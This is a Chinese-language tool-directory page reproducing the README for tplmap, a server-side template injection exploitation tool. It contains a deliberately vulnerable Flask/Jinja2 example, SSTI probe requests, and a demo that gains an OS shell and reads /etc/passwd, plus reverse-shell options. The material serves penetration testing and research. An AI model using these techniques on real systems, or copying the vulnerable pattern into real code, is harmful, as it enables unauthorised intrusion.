Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
tplmap — 服务端模板注入与代码注入检测及利用工具 | Kitploit
工具/GitHubGitHub/epinna/tplmap
漏洞扫描器代码分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubepinna/tplmap

tplmap

服务端模板注入与代码注入检测及利用工具

查看仓库
4.2k684254年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Tplmap

本项目已不再维护。只要不破坏测试套件,我会合并新的PR。

Tplmap 协助利用代码注入和服务器端模板注入漏洞,借助多种沙箱逃逸技术,获取底层操作系统的访问权限。

该工具及其测试套件旨在研究 SSTI 漏洞类别,并作为 Web 应用程序渗透测试中的进攻性安全工具使用。

沙箱逃逸技术源自 James Kett 的服务器端模板注入:现代 Web 应用的 RCE、其他公开研究 [1] [2],以及本工具的原創贡献[3] [4]。

它可以利用多种代码上下文和盲注入场景。它还支持 Python、Ruby、PHP、Java 中的类似 eval() 的代码注入以及通用的非沙箱模板引擎。

服务器端模板注入

假设你正在审计一个网站,该网站使用用户提供的值组合模板来生成动态页面,例如下面这个用 Python 和 Flask 编写的 Web 应用程序,它不安全地使用了 Jinja2 模板引擎。

from flask import Flask, request
from jinja2 import Environment

app = Flask(__name__)
Jinja2 = Environment()

@app.route("/page")
def page():

    name = request.values.get('name')
    
    # SSTI 漏洞
    # 漏洞是由于将用户提供的 `name` 变量拼接到模板字符串中引入的。
    output = Jinja2.from_string('Hello ' + name + '!').render()
    
    # 相反,该变量应传递给模板上下文。
    # Jinja2.from_string('Hello {{name}}!').render(name = name)

    return output

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=80)

从黑盒测试的角度看,页面反射的值类似于 XSS 漏洞,但同时也会在运行时计算基本操作,从而暴露其 SSTI 本质。

$ curl -g 'http://www.target.com/page?name=John'
Hello John!
$ curl -g 'http://www.target.com/page?name={{7*7}}'
Hello 49!

利用

Tplmap 能够检测并利用一系列模板引擎中的 SSTI,从而获取底层文件系统和操作系统的访问权限。将其针对 URL 运行,以测试参数是否可被利用。

$ ./tplmap.py -u 'http://www.target.com/page?name=John'
[+] Tplmap 0.5
    Automatic Server-Side Template Injection Detection and Exploitation Tool

[+] Testing if GET parameter 'name' is injectable
[+] Smarty plugin is testing rendering with tag '{*}'
[+] Smarty plugin is testing blind injection
[+] Mako plugin is testing rendering with tag '${*}'
...
[+] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] Tplmap identified the following injection point:

  GET parameter: name
  Engine: Jinja2
  Injection: {{*}}
  Context: text
  OS: linux
  Technique: render
  Capabilities:

   Shell command execution: ok
   Bind and reverse shell: ok
   File write: ok
   File read: ok
   Code evaluation: ok, python code

[+] Rerun tplmap providing one of the following options:

    --os-shell                Run shell on the target
    --os-cmd                  Execute shell commands
    --bind-shell PORT         Connect to a shell bind to a target port
    --reverse-shell HOST PORT Send a shell back to the attacker's port
    --upload LOCAL REMOTE     Upload files to the server
    --download REMOTE LOCAL   Download remote files

使用 --os-shell 选项在目标上启动伪终端。

$ ./tplmap.py --os-shell -u 'http://www.target.com/page?name=John'
[+] Tplmap 0.5
    Automatic Server-Side Template Injection Detection and Exploitation Tool

[+] Run commands on the operating system.

linux $ whoami
www
linux $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh

支持的模板引擎

Tplmap 支持超过 15 种模板引擎、非沙箱模板引擎以及通用的 eval() 类注入。

引擎远程命令执行盲注入代码评估文件读取文件写入
Mako✓✓Python✓✓
Jinja2✓✓Python✓✓
Python (code eval)✓✓Python✓✓
Tornado✓✓Python✓✓
Nunjucks✓✓JavaScript✓✓
Pug✓✓JavaScript✓✓
doT✓✓JavaScript✓✓
Marko✓✓JavaScript✓✓
JavaScript (code eval)✓✓JavaScript✓✓
Dust (<= [email protected])✓✓JavaScript✓✓
EJS✓✓JavaScript✓✓
Ruby (code eval)✓✓Ruby✓✓
Slim✓✓Ruby✓✓
ERB✓✓Ruby✓✓
Smarty (unsecured)✓✓PHP✓✓
PHP (code eval)✓✓PHP✓✓
Twig (<=1.19)✓✓PHP✓✓
Freemarker✓✓Java✓✓
Velocity✓✓Java✓✓
Twig (>1.19)×××××
Smarty (secured)×××××
Dust (> [email protected])×××××

Burp Suite 插件

请参阅 burp_extension/README.md。

下载工具